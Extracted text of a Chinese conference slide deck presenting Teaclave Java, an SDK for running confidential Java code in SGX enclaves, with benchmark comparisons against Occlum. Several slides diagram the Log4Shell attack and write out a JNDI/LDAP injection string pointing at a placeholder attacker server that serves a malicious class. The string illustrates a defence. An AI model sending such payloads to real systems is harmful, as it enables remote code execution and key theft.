林子熠-Java機密計算.pdf

《林子熠-Java機密計算.pdf》由會員分享，可在線閱讀，更多相關《林子熠-Java機密計算.pdf（17頁珍藏版）》請在三個皮匠報告上搜索。

1、昔日王謝堂前燕，飛入尋常百姓家-Teaclave Java，為Java應用帶來機密計算能力的SDK框架演講人：林子熠CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023Core

2、JavaWeek 2023關于我 林子熠 博士 工業界：阿里巴巴JVM團隊技術專家，負責GraalVM Java靜態編譯和靜態分析的開發和應用 學術界：CCF系統專委會執行委員，ACM SIGSOFT（ICSE 2023）杰出論文獎獲得者 開源社區：GraalVM社區貢獻者，Apache Committer，龍蜥社區機密計算SIG maintainer 其他:GraalVM與Java靜態編譯原理與應用作者CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWee

3、k 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023動機-如何保障Java應用中的密碼安全呢?密碼以明文保存在內存中，很容易泄漏java.lang.Stringprivate char values反射設置為空加密密碼密碼應用生命周期解密加密密碼密碼應用生命周期銷毀解密CoreJavaWeek 2023CoreJavaWeek 20

4、23CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023動機-Log4j漏洞示意https:/nvd.nist.gov/vuln/detail/CVE-2021-44228Java Application Se

5、rverlog4j-core-2.14.x.jarInject malicious request:$jndi:ldap:/xx.xx.xx.xx:1389/AttackerAttacking Server(ip:xx.xx.xx.xx:1389)12memoryPrivate Keydecrypting3ClientEncrypt MessagePublic Key45Attacker.class67CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek

6、 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023高等級的安全保障機密計算 三大安全支柱：存儲時加密、傳輸時加密、運行時加密 硬件隔離出安全與非安全環境，僅信任CPU，實現最高安全等級 用于多方安全計算、同態加密、聯邦計算、區塊鏈等諸多場景執行環境TEEmemory任意安全敏感型程序REEmemory安全不敏感程序X86:Intel

7、 SGXARM:TrustZoneARM:CCARISC-V:KeyStoneCoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023TEELib

8、OS在TEE中運行Java程序現狀 TEE中只能運行native程序 現有方案：Occlum，在TEE中支持JVM，再運行Java程序 存在的問題 可信計算基（Trusted Computing Base，TCB）太大，安全性降低 性能下降REEJVMAPPlauncherOcclumTEElog4j-core-2.14.x.jarInject malicious request:$jndi:ldap:/xx.xx.xx.xx:1389/AttackerAttacking Server(ip:xx.xx.xx.xx:1389)12memoryPrivate Keydecrypting3Clie

9、ntEncrypt MessagePublic Key45Attacker.class67CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023

10、Teaclave Java TEE SDK Teaclave Java TEE SDK定義了Java機密計算的編程模型，實現了Java機密計算的開發框架和構建工具鏈 運行時：從非機密Java程序通過JNI管理和調用TEE中的native機密程序 開發時：使用Java編寫非機密與機密程序。機密程序服務化，通過SPI機制調用 構建時：Javac編譯Java非機密程序，GraalVM編譯Java機密程序為native動態庫 獲得成果Xinyuan Miao,Ziyi Lin,Shaojun Wang,Lei Yu,Sanhong Li,Zihan Wang,Pengbo Nie,Yuting Che

11、n,Beijun Shen,He Jiang.Lejacon:A Lightweight and Efficient Approach to Java Confidential Computing on SGX.ICSE 2023.Distinguished paper.正在Apache Teaclave社區開源孵化：https:/teaclave.apache.org 貢獻單位：百度、阿里云、螞蟻、Intel Teaclave Faas Platform：通用隱私計算平臺 Teaclave SGX SDK：Intel SGX平臺Rust語言SDK Teaclave TrustZone SDK

12、：ARM TrustZone平臺Rust語言SDK Teaclave Java TEE SDK：Intel SGX平臺Java語言SDK https:/ 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 20

13、23CoreJavaWeek 2023Teaclave Java編程模型 機密任務服務化普通程序中調用服務機密服務聲明機密服務實現Teaclave Java開發視圖HostEnclaveSPIUnsecure.javaSecure.javaCommonEnclaveService CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJa

14、vaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023Teaclave Java構建模型 Maven一鍵構建 分別編譯 普通程序-javac編譯部署到普通環境 機密服務-GraalVM靜態編譯為動態庫文件部署到TEE中 GraalVM是由Oracle主導的開源純Java實現的多語言高性能運行時平臺 GraalVM編譯器 SubstrateVM Java靜態編譯框架和運行時支持部署視圖普通環境TEESPIUnsecure.classlibsecure.so服務

15、代理JNI框架輔助代碼CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023GraalVM靜態編譯Java程序可達代碼configJDKJar編

16、譯可執行文件Musl靜態可執行文件動態庫文件靜態分析（指向分析）程序自動劃分有效降低TCB優點優點安全性提升：減少動態性性能提升：無需解釋執行和JIT編譯CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023Co

17、reJavaWeek 2023CoreJavaWeek 2023Teaclave Java機密計算生命周期管理 Teaclave Java提供了機密計算任務的生命周期管理API 創建Enclave環境：機密計算的運行時環境 遠程證明機密環境安全性：證明當前的SGX環境是真實可靠的 加載Enclave服務：在Enclave環境中綁定機密計算服務 調用服務函數：調用機密計算服務提供的函數，執行機密計算 銷毀Enclave環境：使用完畢，銷毀環境，釋放TEE資源 同一個Java應用可以在TEE中管理多個相互隔離的Enclave運行時環境運行時視圖TEEREECreate Enclave Enviro

18、nmentLoad Enclave ServiceInvoke Service MethodEnclaveAttestation執行機密代碼EnclaveEnclaveDestroy Enclave EnvironmentCoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023Co

19、reJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023效果評估-抵御Log4J漏洞Java Application ServerREETEElog4j-core-2.14.x.jarInject malicious request:$jndi:ldap:/xx.xx.xx.xx:1389/AttackerAttacking Server(ip:xx.xx.xx.xx:1389)12memoryPrivate Keydecrypting3ClientEncrypt MessagePublic Key45Attacker

20、.class6delegate7CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023效果評估-TCB050100150200250300350

21、400450app-printapp-digest(256KB)app-rsaapp-sqlparserct-asn1ct-i18nct-utilct-mathct-pqcct-cryptoTrusted Artifact Size(MB)TCB Size ComparisonOcclumJ TCB-LS(MB)Lejacon TCB-LS(MB)測測試試用用例例依依賴賴主主要要三三方方庫庫描描述述app-print 打印一條消息字符串app-digest BouncyCastle-full調用BouncyCastle計算hash值app-rsa BouncyCastle-full調用Boun

22、cyCastle進行RSA加密app-sqlparserDruid使用Druid進行SQL解析ct-asn1 BouncyCastle-coreBouncyCastle-core的asn1子模塊測試ct-i18n BouncyCastle-coreBouncyCastle-core的i18n子模塊測試ct-util BouncyCastle-coreBouncyCastle-core的util子模塊測試ct-math BouncyCastle-coreBouncyCastle-core的math子模塊測試ct-pqcBouncyCastle-coreBouncyCastle-core的pqc子

23、模塊測試ct-cryptoBouncyCastle-coreBouncyCastle-core的crypto子模塊測試CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023Cor

24、eJavaWeek 2023效果評估 性能050001000015000200002500030000app-printapp-digestapp-rsaapp-sqlparserct-asn1ct-i18nct-utilct-mathct-pqcct-crypto執行時間（毫秒）運行時性能對比OcclumJ Exe Time(ms)Lejacon Exe Time(ms)Java Exe Time(ms)0100200300400500600app-printapp-digest(256KB)app-rsaapp-sqlparserct-asn1ct-i18nct-utilct-mathct

25、-pqcct-cryptoMemory Usage(MB)運行時內存消耗OcclumJ IEMF(MB)Lejacon IEMF(MB)CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWee

26、k 2023CoreJavaWeek 2023缺少SGX硬件怎么辦？當沒有SGX硬件時，Teaclave Java從機密計算退化為安全沙箱計算 GraalVM編譯的native image本身具有隔離性和自舉性，是一個安全容器 Native image內部不支持動態特性，無法通過反射和動態類加載對其攻擊 Java程序與native image之間內存隔離，運行時獲取native image的內存狀態具有一定難度CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJava

27、Week 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023總結 Teaclave Java是一站式的Java機密計算解決方案 編碼時：提供編程模型 構建時：提供構建工具鏈 運行時：機密服務生命周期管理 Teaclave Java安全性更高、性能更高 Teaclave Java在缺少SGX硬件時依然可以提供安全沙箱級別的保護 參考Xi

28、nyuan Miao,Ziyi Lin,Shaojun Wang,Lei Yu,Sanhong Li,Zihan Wang,Pengbo Nie,Yuting Chen,Beijun Shen,He Jiang.Lejacon:A Lightweight and Efficient Approach to Java Confidential Computing on SGX.ICSE 2023.Distinguished paper.Apache開源孵化鏈接：https:/ GraalVM與Java靜態編譯原理與應用CoreJavaWeek 2023CoreJavaWeek 2023CoreJ

29、avaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023感謝聆聽演講人：林子熠我的微信Teaclave Java Github中文版萬字長文詳解CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023